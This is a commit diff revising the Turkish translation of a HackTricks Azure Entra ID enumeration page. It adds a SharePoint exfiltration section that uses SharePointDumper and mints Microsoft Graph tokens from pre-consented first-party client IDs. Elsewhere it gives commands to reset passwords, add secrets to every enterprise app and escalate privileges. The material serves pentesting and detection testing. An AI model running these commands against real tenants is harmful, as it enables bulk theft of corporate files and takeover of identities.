Translated ['', 'src/pentesting-cloud/azure-security/az-services/az-azur

This commit is contained in:
Translator
2026-02-12 12:19:50 +00:00
parent 0166ad5b96
commit 8a7da60408
@@ -4,11 +4,11 @@
## Temel Bilgiler
Azure Active Directory (Azure AD), Microsoft'un kimlik ve erişim yönetimi için bulut tabanlı hizmetidir. Çalışanların, Microsoft 365, Azure portalı ve birçok diğer SaaS uygulaması dahil olmak üzere, hem organizasyon içinde hem de dışında kaynaklara giriş yapmalarını sağlamakta önemli bir rol oynamaktadır. Azure AD'nin tasarımı, **kimlik doğrulama, yetkilendirme ve kullanıcı yönetimi** gibi temel kimlik hizmetlerini sunmaya odaklanmaktadır.
Azure Active Directory (Azure AD), Microsoft'un kimlik ve erişim yönetimi için bulut tabanlı hizmetidir. Çalışanların kuruluş içindeki ve dışındaki kaynaklara erişmek için oturum açmalarını sağlar; buna Microsoft 365, the Azure portal ve diğer birçok SaaS uygulaması dahildir. Azure AD'nin tasarımı, temel kimlik hizmetlerini sunmaya odaklanır; özellikle **authentication, authorization, and user management**.
Azure AD'nin ana özellikleri arasında **çok faktörlü kimlik doğrulama** ve **koşullu erişim** yer almakta olup, diğer Microsoft güvenlik hizmetleriyle sorunsuz entegrasyon sağlamaktadır. Bu özellikler, kullanıcı kimliklerinin güvenliğini önemli ölçüde artırmakta ve organizasyonların erişim politikalarını etkili bir şekilde uygulayıp zorlamalarına olanak tanımaktadır. Microsoft'un bulut hizmetleri ekosisteminin temel bir bileşeni olarak, Azure AD, kullanıcı kimliklerinin bulut tabanlı yönetimi için kritik öneme sahiptir.
Azure AD'nin ana özellikleri arasında **multi-factor authentication** ve **conditional access**, ayrıca diğer Microsoft güvenlik hizmetleriyle sorunsuz entegrasyon bulunur. Bu özellikler kullanıcı kimliklerinin güvenliğini önemli ölçüde artırır ve organizasyonların erişim politikalarını etkin şekilde uygulamasını sağlar. Microsoft'un bulut hizmetleri ekosisteminin temel bileşenlerinden biri olarak, Azure AD bulut tabanlı kullanıcı kimlik yönetimi için kritik bir rol oynar.
## Sayım
## Keşif
### **Bağlantı**
@@ -96,6 +96,7 @@ Connect-AzAccount -Credential $creds
# Connect with access token
Connect-AzAccount -AccountId test@corp.onmicrosoft.com [-AccessToken $ManagementToken] [-GraphAccessToken $AADGraphToken] [-MicrosoftGraphAccessToken $MicrosoftGraphToken] [-KeyVaultAccessToken $KeyVaultToken]
# If connecting with some metadata token, in "-AccountId" put the OID of the managed identity (get it from the JWT token)
# Connect with Service principal/enterprise app secret
$password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force
@@ -184,11 +185,11 @@ Connect-AzureAD -AccountId test@corp.onmicrosoft.com -AadAccessToken $token
{{#endtab }}
{{#endtabs }}
Azure'a herhangi bir program aracılığıyla **CLI** ile **giriş yaptığınızda**, **Microsoft**'a ait bir **tenant**'tan bir **Azure Uygulaması** kullanıyorsunuz. Bu Uygulamalar, hesabınızda oluşturabileceğinizler gibi, **bir istemci kimliğine** sahiptir. **Hepsini göremeyeceksiniz** **ama varsayılan olarak izin verilmiştir**.
Herhangi bir programla **CLI** üzerinden Azure'a **login** yaptığınızda, **Microsoft**'a ait bir **tenant** içindeki bir **Azure Application**'ı kullanırsınız. Hesabınızda oluşturabileceğiniz uygulamalar gibi bu uygulamaların da **have a client id**. Konsolda görebileceğiniz **allowed applications lists** içinde hepsini **won't be able to see all of them**, fakat varsayılan olarak **but they are allowed by default**.
Örneğin, **kimlik doğrulayan** bir **powershell script** istemci kimliği **`1950a258-227b-4e31-a9cf-717495945fc2`** olan bir uygulama kullanır. Uygulama konsolda görünmese bile, bir sistem yöneticisi bu uygulamayı **engelleyebilir** böylece kullanıcılar bu Uygulama aracılığıyla erişim sağlayamaz.
Örneğin **powershell script** ile **authenticates** yapan bir betik, client id'si **`1950a258-227b-4e31-a9cf-717495945fc2`** olan bir uygulamayı kullanır. Uygulama konsolda görünmese bile, bir sysadmin **block that application** yapabilir; böylece kullanıcılar o App üzerinden bağlanan araçlarla erişemezler.
Ancak, **Azure'a bağlanmanıza izin verecek** **başka istemci kimlikleri** de vardır:
Ancak **other client-ids**'i olan uygulamalar **will allow you to connect to Azure**:
```bash
# The important part is the ClientId, which identifies the application to login inside Azure
@@ -213,7 +214,7 @@ $token = Invoke-Authorize -Credential $credential `
-Verbose -Debug `
-InformationAction Continue
```
### Kiracılar
### Tenantlar
{{#tabs }}
{{#tab name="az cli" }}
@@ -226,7 +227,7 @@ az account tenant list
### Kullanıcılar
Entra ID kullanıcıları hakkında daha fazla bilgi için kontrol edin:
Entra ID kullanıcıları hakkında daha fazla bilgi için bakın:
{{#ref}}
../az-basic-information/
@@ -357,7 +358,7 @@ Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
{{#endtab }}
{{#endtabs }}
#### Kullanıcı Şifresini Değiştir
#### Kullanıcı Parolasını Değiştir
```bash
$password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText Force
@@ -365,15 +366,15 @@ $password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText
```
### MFA & Conditional Access Policies
Her kullanıcıya MFA eklenmesi şiddetle önerilir, ancak bazı şirketler bunu ayarlamayabilir veya bunu bir Conditional Access ile ayarlayabilir: Kullanıcı, belirli bir konumdan, tarayıcıdan veya **bazı koşul** ile giriş yapıyorsa **MFA gereklidir**. Bu politikalar, doğru yapılandırılmazsa **bypass**'lara karşı hassas olabilir. Kontrol edin:
Herkese MFA eklemek şiddetle tavsiye edilir; ancak bazı şirketler bunu ayarlamayabilir veya Conditional Access ile yapılandırabilir: Kullanıcı belirli bir konumdan, tarayıcıdan veya **bazı bir koşul** nedeniyle giriş yaparsa **MFA gerekli ise**. Bu politikalar doğru yapılandırılmamışsa **bypasses**'a açık olabilir. Bakınız:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
{{#endref}}
### Groups
### Gruplar
Entra ID grupları hakkında daha fazla bilgi için kontrol edin:
Entra ID grupları hakkında daha fazla bilgi için bakınız:
{{#ref}}
../az-basic-information/
@@ -480,23 +481,23 @@ Get-AzureADGroup -ObjectId <id> | Get-AzureADGroupAppRoleAssignment | fl *
{{#endtab }}
{{#endtabs }}
#### Gruppa kullanıcı ekle
#### Kullanıcıyı gruba ekle
Grup sahipleri gruba yeni kullanıcılar ekleyebilir.
Grubun sahipleri gruba yeni kullanıcılar ekleyebilir.
```bash
Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
```
> [!WARNING]
> Gruplar dinamik olabilir, bu da temelde **bir kullanıcının belirli koşulları yerine getirmesi durumunda bir gruba ekleneceği** anlamına gelir. Elbette, koşullar **bir kullanıcının** **kontrol edebileceği** **özelliklere** dayanıyorsa, bu özelliği **diğer gruplara girmek için** kötüye kullanabilir.\
> Dinamik grupları nasıl kötüye kullanacağınızı aşağıdaki sayfada kontrol edin:
> Gruplar dinamik olabilir; bu temel olarak **bir kullanıcı belirli koşulları sağlarsa bir gruba ekleneceği** anlamına gelir. Elbette, koşullar **kullanıcının kontrol edebileceği özelliklere** dayanıyorsa, kullanıcı bu özelliği **diğer gruplara girmek** için kötüye kullanabilir.\
> Dinamik grupların nasıl kötüye kullanılacağını aşağıdaki sayfada inceleyin:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
{{#endref}}
### Hizmet İlkeleri
### Service Principals
Entra ID hizmet ilkeleri hakkında daha fazla bilgi için kontrol edin:
Entra ID service principals hakkında daha fazla bilgi için şu sayfaya bakın:
{{#ref}}
../az-basic-information/
@@ -597,11 +598,11 @@ Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalMembersh
{{#endtabs }}
> [!WARNING]
> Bir Service Principal'in sahibi şifresini değiştirebilir.
> A Service Principal'ın Owner'ı parolasını değiştirebilir.
<details>
<summary>Her Enterprise App üzerinde bir istemci sırrı eklemeyi listele ve dene</summary>
<summary>Her Enterprise App için client secret'ı listele ve eklemeyi dene</summary>
```bash
# Just call Add-AzADAppSecret
Function Add-AzADAppSecret
@@ -708,16 +709,16 @@ Write-Output "Failed to Enumerate the Applications."
### Uygulamalar
Uygulamalar hakkında daha fazla bilgi için kontrol edin:
Uygulamalar hakkında daha fazla bilgi için bakınız:
{{#ref}}
../az-basic-information/
{{#endref}}
Bir Uygulama oluşturulduğunda 2 tür izin verilir:
Bir uygulama oluşturulduğunda 2 tür izin verilir:
- **Hizmet Prensibi** için verilen **İzinler**
- **Kullanıcı** adına **uygulamanın** sahip olabileceği ve kullanabileceği **İzinler**.
- **İzinler** **Service Principal**'e verilen
- **İzinler** **uygulamanın** **kullanıcı adına** sahip olabileceği ve kullanabileceği
{{#tabs }}
{{#tab name="az cli" }}
@@ -742,6 +743,33 @@ az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/1e92
# Get Cloud Applications Administrators (full access over apps)
az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/0d601d27-7b9c-476f-8134-8e7cd6744f02/members"
# Get "API Permissions" of an App
## Get the ResourceAppId
az ad app show --id "<app-id>" --query "requiredResourceAccess" --output json
## e.g.
[
{
"resourceAccess": [
{
"id": "e1fe6dd8-ba31-4d61-89e7-88639da4683d",
"type": "Scope"
},
{
"id": "d07a8cc0-3d51-4b77-b3b0-32704d1f69fa",
"type": "Role"
}
],
"resourceAppId": "00000003-0000-0000-c000-000000000000"
}
]
## For the perms of type "Scope"
az ad sp show --id <ResourceAppId> --query "oauth2PermissionScopes[?id=='<id>'].value" -o tsv
az ad sp show --id "00000003-0000-0000-c000-000000000000" --query "oauth2PermissionScopes[?id=='e1fe6dd8-ba31-4d61-89e7-88639da4683d'].value" -o tsv
## For the perms of type "Role"
az ad sp show --id <ResourceAppId> --query "appRoles[?id=='<id>'].value" -o tsv
az ad sp show --id 00000003-0000-0000-c000-000000000000 --query "appRoles[?id=='d07a8cc0-3d51-4b77-b3b0-32704d1f69fa'].value" -o tsv
```
{{#endtab }}
@@ -792,21 +820,21 @@ Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *
{{#endtabs }}
> [!WARNING]
> **`AppRoleAssignment.ReadWrite`** iznine sahip bir uygulama kendisine rol vererek **Global Admin**'e **yükseltebilir**.\
> Daha fazla bilgi için [**bunu kontrol et**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48).
> Bir uygulama **`AppRoleAssignment.ReadWrite`** iznine sahipse kendisine rol vererek **Global Admin'e yükseltebilir**.\
> Daha fazla bilgi için [**check this**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48).
> [!NOTE]
> Bir uygulamanın bir token talep ederken kimliğini kanıtlamak için kullandığı gizli dize uygulama şifresidir.\
> Bu nedenle, bu **şifreyi** bulursanız **tenant** içinde **service principal** olarak erişim sağlayabilirsiniz.\
> Bu şifrenin yalnızca oluşturulduğunda görünür olduğunu unutmayın (değiştirebilirsiniz ama tekrar alamazsınız).\
> **Uygulamanın** **sahibi** ona **bir şifre ekleyebilir** (böylece onu taklit edebilir).\
> Bu service principal'lar olarak girişler **riskli olarak işaretlenmez** ve **MFA'ya sahip olmazlar.**
> Uygulamanın token isterken kimliğini kanıtlamak için kullandığı gizli dize uygulama parolasıdır.\
> Yani, eğer bu **parolayı** bulursanız **service principal** olarak **tenant** içinde erişim sağlayabilirsiniz.\
> Bu parolanın yalnızca oluşturulduğu anda görülebildiğini unutmayın (değiştirebilirsiniz ama tekrar elde edemezsiniz).\
> **Uygulamanın** **sahibi** uygulamaya **bir parola ekleyebilir** (böylece onu taklit edebilir).\
> Bu service principal'larla yapılan oturum açmaları **riskli olarak işaretlenmez** ve bunlarda **MFA** olmaz.
Microsoft'a ait yaygın olarak kullanılan App ID'lerinin bir listesini [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications) adresinde bulmak mümkündür.
Microsoft'a ait yaygın kullanılan App ID'lerin bir listesini şu adreste bulmak mümkündür: [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications)
### Managed Identities
Managed Identities hakkında daha fazla bilgi için kontrol edin:
Daha fazla bilgi için Managed Identities bakınız:
{{#ref}}
../az-basic-information/
@@ -824,7 +852,7 @@ az identity list --output table
### Azure Rolleri
Azure rolleri hakkında daha fazla bilgi için kontrol edin:
Azure rolleri hakkında daha fazla bilgi için bakınız:
{{#ref}}
../az-basic-information/
@@ -911,7 +939,7 @@ Headers = @{
### Entra ID Rolleri
Azure rolleri hakkında daha fazla bilgi için kontrol edin:
Azure roller hakkında daha fazla bilgi için bakınız:
{{#ref}}
../az-basic-information/
@@ -1032,12 +1060,12 @@ Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember
{{#endtabs }}
> [!WARNING]
> Eğer bir cihaz (VM) **AzureAD'e katılmışsa**, AzureAD'den kullanıcılar **giriş yapabilecektir**.\
> Dahası, eğer giriş yapan kullanıcı cihazın **Sahibi** ise, o **yerel yönetici** olacaktır.
> Eğer bir cihaz (VM) **AzureAD joined** ise, AzureAD'den kullanıcılar **giriş yapabilecekler**.\
> Ayrıca, oturum açan kullanıcı cihazın **Owner**'ı ise, **local admin** olacak.
### Yönetim Birimleri
Yönetim birimleri hakkında daha fazla bilgi için kontrol edin:
Yönetim birimleri hakkında daha fazla bilgi için bakınız:
{{#ref}}
../az-basic-information/
@@ -1072,13 +1100,60 @@ Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members
{{#endtab }}
{{#endtabs }}
## Entra ID Ayrıcalık Yükseltme
## Microsoft Graph delegated SharePoint data exfiltration (SharePointDumper)
Sahip oldukları **delegated Microsoft Graph token** içinde **`Sites.Read.All`** veya **`Sites.ReadWrite.All`** bulunan saldırganlar, Graph üzerinden **sites/drives/items** öğelerini listeleyebilir ve ardından erişim belirteci içeren zaman sınırlı **SharePoint pre-authentication download URLs** aracılığıyla **dosya içeriklerini çekebilirler**. The [SharePointDumper](https://github.com/zh54321/SharePointDumper) scripti tüm akışı (enumeration → pre-auth downloads) otomatikleştirir ve tespit testleri için isteğe göre telemetri üretir.
### Obtaining usable delegated tokens
- SharePointDumper kendisi **kimlik doğrulaması yapmaz**; bir access token sağlayın (isteğe bağlı olarak refresh token).
- Önceden onaylanmış **first-party clients**, bir uygulama kaydetmeden Graph token mintlemek için kötüye kullanılabilir. Örnek `Invoke-Auth` (from [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)) çağrıları:
```powershell
# CAE requested by default; yields long-lived (~24h) access token
Import-Module ./EntraTokenAid/EntraTokenAid.psm1
$tokens = Invoke-Auth -ClientID 'b26aadf8-566f-4478-926f-589f601d9c74' -RedirectUrl 'urn:ietf:wg:oauth:2.0:oob' # OneDrive (FOCI TRUE)
# Other pre-consented clients
Invoke-Auth -ClientID '1fec8e78-bce4-4aaf-ab1b-5451cc387264' -RedirectUrl 'https://login.microsoftonline.com/common/oauth2/nativeclient' # Teams (FOCI TRUE)
Invoke-Auth -ClientID 'd326c1ce-6cc6-4de2-bebc-4591e5e13ef0' -RedirectUrl 'msauth://code/ms-sharepoint-auth%3A%2F%2Fcom.microsoft.sharepoint' # SharePoint (FOCI TRUE)
Invoke-Auth -ClientID '4765445b-32c6-49b0-83e6-1d93765276ca' -RedirectUrl 'https://scuprodprv.www.microsoft365.com/spalanding' -Origin 'https://doesnotmatter' # OfficeHome (FOCI FALSE)
Invoke-Auth -ClientID '08e18876-6177-487e-b8b5-cf950c1e598c' -RedirectUrl 'https://onedrive.cloud.microsoft/_forms/spfxsinglesignon.aspx' -Origin 'https://doesnotmatter' # SPO Web Extensibility (FOCI FALSE)
```
> [!NOTE]
> FOCI TRUE istemcileri cihazlar arasında refresh'ı destekler; FOCI FALSE istemciler genellikle `-Origin` gerektirir, reply URL origin doğrulamasını karşılamak için.
### SharePointDumper'ı enumeration + exfiltration için çalıştırma
- Temel dump custom UA / proxy / throttling ile:
```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -UserAgent "Not SharePointDumper" -RequestDelaySeconds 2 -Variation 3 -Proxy 'http://127.0.0.1:8080'
```
- Kapsam kontrolü: siteleri veya uzantıları dahil/ hariç etme ve genel limitler:
```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -IncludeSites 'Finance','Projects' -IncludeExtensions pdf,docx -MaxFiles 500 -MaxTotalSizeMB 100
```
- **Kesintiye uğramış çalışmaları sürdür** (yeniden listeler ancak indirilen öğeleri atlar):
```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -Resume -OutputFolder .\20251121_1551_MyTenant
```
- **Otomatik token refresh HTTP 401'de** (gerektirir EntraTokenAid yüklü):
```powershell
Import-Module ./EntraTokenAid/EntraTokenAid.psm1
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -RefreshToken $tokens.refresh_token -RefreshClientId 'b26aadf8-566f-4478-926f-589f601d9c74'
```
Operasyonel notlar:
- Çalışma sırasında süresinin dolmasını önlemek için CAE-enabled tokenları tercih eder; yenileme denemeleri aracın API kayıtlarında loglanmaz.
- Graph + SharePoint için CSV/JSON istek kayıtları üretir ve gömülü SharePoint indirme tokenlerini varsayılan olarak maskeler (açılıp kapatılabilir).
- Özelleştirilmiş User-Agent, HTTP proxy, isteğe özel gecikme + jitter ve Ctrl+C ile güvenli kapanış desteği sunar; tespit/IR testleri sırasında trafik şekillendirme için.
## Entra ID Privilege Escalation
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/
{{#endref}}
## Azure Ayrıcalık Yükseltme
## Azure Privilege Escalation
{{#ref}}
../az-privilege-escalation/az-authorization-privesc.md
@@ -1086,60 +1161,62 @@ Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members
## Savunma Mekanizmaları
### Ayrıcalıklı Kimlik Yönetimi (PIM)
### Privileged Identity Management (PIM)
Azure'daki Ayrıcalıklı Kimlik Yönetimi (PIM), kullanıcıların gereksiz yere **aşırı ayrıcalıklar** almasını **önlemeye** yardımcı olur.
Privileged Identity Management (PIM), Azure'da kullanıcıların gereksiz yere aşırı ayrıcalıklara sahip olmasını engellemeye yardımcı olur.
PIM'in sağladığı ana özelliklerden biri, sürekli aktif olan ilkelere roller atanmamasını sağlamasıdır; bunun yerine onları **belirli bir süre (örneğin 6 ay)** için **uygun** hale getirir. Kullanıcı, bu rolü etkinleştirmek istediğinde, ihtiyaç duyduğu süreyi belirterek talep etmesi gerekir (örneğin 3 saat). Ardından, bir **yönetici talebi onaylamalıdır**.\
Kullanıcının süreyi **uzatma** talebinde bulunabileceğini unutmayın.
PIM'in sağladığı ana özelliklerden biri, sürekli etkin olan principal'lara roller atamak yerine bunları belirli bir süre için (ör. 6 ay) uygun (eligible) hale getirmeye izin vermesidir. Kullanıcı o rolü aktifleştirmek istediğinde, ayrıcalığa ihtiyaç duyduğu süreyi (ör. 3 saat) belirterek talepte bulunur. Ardından bir admin isteği onaylamalıdır.\
Kullanıcı ayrıca süreyi uzatma talebinde bulunabilir.
Ayrıca, **PIM,** ayrıcalıklı bir rol birine atandığında e-posta gönderir.
Ayrıca, PIM ayrıcalıklı bir rol birisine atandığında e-posta gönderir.
<figure><img src="../../../images/image (354).png" alt=""><figcaption></figcaption></figure>
PIM etkinleştirildiğinde, her rolü belirli gereksinimlerle yapılandırmak mümkündür:
PIM etkinleştirildiğinde, her rolü aşağıdaki gereksinimlerle yapılandırmak mümkündür:
- Etkinleştirmenin maksimum süresi (saat)
- Etkinleştirme sırasında MFA gerektir
- Koşullu Erişim kimlik doğrulama bağlamı gerektir
- Etkinleştirme sırasında gerekçe gerektir
- Etkinleştirme sırasında bilet bilgisi gerektir
- Etkinleştirmek için onay gerektir
- Uygun atamaların süresinin dolması için maksimum süre
- Belirli eylemler gerçekleştiğinde bu rol ile ilgili bildirimlerin kime ve ne zaman gönderileceği konusunda daha fazla yapılandırma
- Aktivasyonun maksimum süresi (saat)
- Aktivasyon sırasında MFA gerektir
- Aktivasyon için Conditional Access authentication context gerektir
- Aktivasyon için gerekçe gerektir
- Aktivasyon sırasında bilet bilgisi gerektir
- Aktive etmek için onay gerektir
- Uygun atamaların sona erme süresi için maksimum zaman
- Bu rol ile belirli eylemler gerçekleştiğinde ne zaman ve kime bildirim gönderileceğine dair çok daha fazla yapılandırma
### Koşullu Erişim Politikaları
### Conditional Access Policies
Kontrol et:
Check:
{{#ref}}
../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
{{#endref}}
### Entra Kimlik Koruma
### Entra Identity Protection
Entra Kimlik Koruma, bir kullanıcının veya oturum açmanın kabul edilemeyecek kadar **riskli olduğunu tespit etmeye** olanak tanıyan bir güvenlik hizmetidir ve kullanıcının veya oturum açma girişiminin **engellenmesini** sağlar.
Entra Identity Protection, bir kullanıcının veya oturum açmanın kabul edilemeyecek kadar riskli olduğunun tespit edilmesine ve kullanıcıyı veya oturum açma girişimini engellemeye olanak tanıyan bir güvenlik hizmetidir.
Yönetici, riski "Düşük ve üzeri", "Orta ve üzeri" veya "Yüksek" olduğunda girişimleri **engelleyecek** şekilde yapılandırabilir. Ancak, varsayılan olarak tamamen **devre dışıdır**:
Yönetici, riske göre girişimleri "Low and above", "Medium and above" veya "High" olduğunda engelleyecek şekilde yapılandırabilir. Ancak varsayılan olarak tamamen devre dışıdır:
<figure><img src="../../../images/image (356).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Günümüzde, aynı seçenekleri yapılandırmanın mümkün olduğu Koşullu Erişim politikaları aracılığıyla bu kısıtlamaların eklenmesi önerilmektedir.
> Günümüzde, bu kısıtlamaların aynı seçeneklerin yapılandırılabildiği Conditional Access politikaları aracılığıyla eklenmesi önerilmektedir.
### Entra Şifre Koruma
### Entra Password Protection
Entra Şifre Koruma ([https://portal.azure.com/index.html#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)), **birden fazla başarısız giriş denemesi olduğunda hesapları kilitleyerek zayıf şifrelerin kötüye kullanılmasını önlemeye yardımcı olan** bir güvenlik özelliğidir.\
Ayrıca, sağlamanız gereken **özel bir şifre listesini yasaklama** olanağı da sunar.
Entra Password Protection ([https://portal.azure.com/index.html#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) zayıf parolaların kötüye kullanılmasını önlemeye yardımcı olan; birkaç başarısız oturum açma girişimi olduğunda hesapları kilitleyen bir güvenlik özelliğidir.\
Ayrıca sağlamanız gereken özel bir parola listesini yasaklamaya izin verir.
Bu, hem bulut düzeyinde hem de yerel Active Directory'de **uygulanabilir**.
Hem bulut düzeyinde hem de kurum içi Active Directory'de uygulanabilir.
Varsayılan mod **Denetim**'dir:
Varsayılan mod Audit'tir:
<figure><img src="../../../images/image (355).png" alt=""><figcaption></figcaption></figure>
## Referanslar
- [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)
- [SharePointDumper](https://github.com/zh54321/SharePointDumper)
- [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)
{{#include ../../../banners/hacktricks-training.md}}